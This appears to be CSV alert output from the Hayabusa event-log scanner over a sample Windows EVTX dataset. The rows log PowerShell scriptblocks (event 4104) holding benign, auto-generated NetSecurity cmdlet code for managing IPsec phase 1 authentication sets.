([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('PolicyStore')) { [object]$__cmdletization_value = ${PolicyStore} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:PolicyStore'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:PolicyStore'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('GPOSession')) { [object]$__cmdletization_value = ${GPOSession} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:GPOSession'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 
'cim:OperationOption:GPOSession'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Name')) { [object]$__cmdletization_value = ${Name} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'InstanceID'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'InstanceID'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('DisplayName')) { [object]$__cmdletization_value = ${DisplayName} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'ElementName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'ElementName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Description')) { [object]$__cmdletization_value = ${Description} $__cmdletization_methodParameter = 
[Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Description'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Description'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Group')) { [object]$__cmdletization_value = ${Group} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'RuleGroup'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'RuleGroup'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Proposal')) { [object]$__cmdletization_value = ${Proposal} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Proposals'; ParameterType = 'Microsoft.Management.Infrastructure.CimInstance[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Proposals'; ParameterType = 'Microsoft.Management.Infrastructure.CimInstance[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = 
$__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Default')) { [object]$__cmdletization_value = ${Default} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:Default'; ParameterType = 'System.Management.Automation.SwitchParameter'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:Default'; ParameterType = 'System.Management.Automation.SwitchParameter'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = $null $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('cim:CreateInstance', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_methodInvocationInfo) } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecPhase1AuthSet.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'New-NetIPsecPhase1AuthSet' -Alias '*' function Get-NetIPsecPhase1AuthSet { [CmdletBinding(DefaultParameterSetName='GetAll', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEP1AuthSet')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, 
Position=0)] [Alias('ID')] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Description}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PrimaryStatus[]] ${PrimaryStatus}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Status}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${PolicyStoreSource}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PolicyStoreType[]] ${PolicyStoreSourceType}, [Parameter(ParameterSetName='ByAssociatedNetIPsecRule', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetConSecRule')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecRule}, [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetMainModeRule')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecMainModeRule}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] 
[Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [switch] ${TracePolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [switch] ${AsJob}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { 
$__cmdletization_exc",../hayabusa-rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx 2021-04-22 19:19:38.514 +09:00,win10-02.offsec.lan,4104,info,,PwSh Scriptblock Log,"#requires -version 3.0 try { Microsoft.PowerShell.Core\Set-StrictMode -Off } catch { } $script:MyModule = $MyInvocation.MyCommand.ScriptBlock.Module $script:ClassName = 'root/standardcimv2/MSFT_NetIKEP1AuthSet' $script:ClassVersion = '1.0.0' $script:ModuleVersion = '1.0.0.0' $script:ObjectModelWrapper = [Microsoft.PowerShell.Cmdletization.Cim.CimCmdletAdapter] $script:PrivateData = [System.Collections.Generic.Dictionary[string,string]]::new() Microsoft.PowerShell.Core\Export-ModuleMember -Function @() function __cmdletization_BindCommonParameters { param( $__cmdletization_objectModelWrapper, $myPSBoundParameters ) if ($myPSBoundParameters.ContainsKey('CimSession')) { $__cmdletization_objectModelWrapper.PSObject.Properties['CimSession'].Value = $myPSBoundParameters['CimSession'] } if ($myPSBoundParameters.ContainsKey('ThrottleLimit')) { $__cmdletization_objectModelWrapper.PSObject.Properties['ThrottleLimit'].Value = $myPSBoundParameters['ThrottleLimit'] } if ($myPSBoundParameters.ContainsKey('AsJob')) { $__cmdletization_objectModelWrapper.PSObject.Properties['AsJob'].Value = $myPSBoundParameters['AsJob'] } } function New-NetIPsecPhase1AuthSet { [CmdletBinding(SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] param( [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${PolicyStore}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${GPOSession}, [Parameter(ParameterSetName='cim:CreateInstance0')] [Alias('ID')] [string] ${Name}, [Parameter(ParameterSetName='cim:CreateInstance0', Mandatory=$true)] [string] ${DisplayName}, 
[Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${Description}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${Group}, [Parameter(ParameterSetName='cim:CreateInstance0', Mandatory=$true)] [ciminstance[]] ${Proposal}, [Parameter(ParameterSetName='cim:CreateInstance0')] [switch] ${Default}, [Parameter(ParameterSetName='cim:CreateInstance0')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='cim:CreateInstance0')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='cim:CreateInstance0')] [switch] ${AsJob}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('PolicyStore')) { [object]$__cmdletization_value = ${PolicyStore} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:PolicyStore'; ParameterType = 
'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:PolicyStore'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('GPOSession')) { [object]$__cmdletization_value = ${GPOSession} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:GPOSession'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:GPOSession'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Name')) { [object]$__cmdletization_value = ${Name} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'InstanceID'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'InstanceID'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) 
[object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('DisplayName')) { [object]$__cmdletization_value = ${DisplayName} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'ElementName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'ElementName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Description')) { [object]$__cmdletization_value = ${Description} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Description'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Description'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Group')) { [object]$__cmdletization_value = ${Group} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'RuleGroup'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = 
[Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'RuleGroup'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Proposal')) { [object]$__cmdletization_value = ${Proposal} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Proposals'; ParameterType = 'Microsoft.Management.Infrastructure.CimInstance[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Proposals'; ParameterType = 'Microsoft.Management.Infrastructure.CimInstance[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Default')) { [object]$__cmdletization_value = ${Default} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:Default'; ParameterType = 'System.Management.Automation.SwitchParameter'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:Default'; ParameterType = 'System.Management.Automation.SwitchParameter'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = $null 
$__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('cim:CreateInstance', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_methodInvocationInfo) } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecPhase1AuthSet.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'New-NetIPsecPhase1AuthSet' -Alias '*' function Get-NetIPsecPhase1AuthSet { [CmdletBinding(DefaultParameterSetName='GetAll', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEP1AuthSet')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [Alias('ID')] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Description}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PrimaryStatus[]] ${PrimaryStatus}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Status}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${PolicyStoreSource}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PolicyStoreType[]] ${PolicyStoreSourceType}, [Parameter(ParameterSetName='ByAssociatedNetIPsecRule', 
Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetConSecRule')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecRule}, [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetMainModeRule')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecMainModeRule}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [switch] ${TracePolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] 
[Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [switch] ${AsJob}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exc",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx 2021-04-22 19:19:38.514 +09:00,win10-02.offsec.lan,4104,medium,,Potentially Malicious PwSh,"eptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) 
$__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Description') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Description}) $__cmdletization_queryBuilder.FilterByProperty('Description', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PrimaryStatus') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PrimaryStatus}) $__cmdletization_queryBuilder.FilterByProperty('PrimaryStatus', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Status') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Status}) $__cmdletization_queryBuilder.FilterByProperty('Status', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSource') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSource}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSource', $__cmdletization_values, $true, 'Default') } if 
($PSBoundParameters.ContainsKey('PolicyStoreSourceType') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSourceType}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSourceType', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecRule') -and (@('ByAssociatedNetIPsecRule') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecRule}, 'MSFT_NetConSecRuleMMAuthSet', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecMainModeRule') -and (@('ByAssociatedNetIPsecMainModeRule') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecMainModeRule}, 'MSFT_NetMainModeRuleMMAuthSet', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if 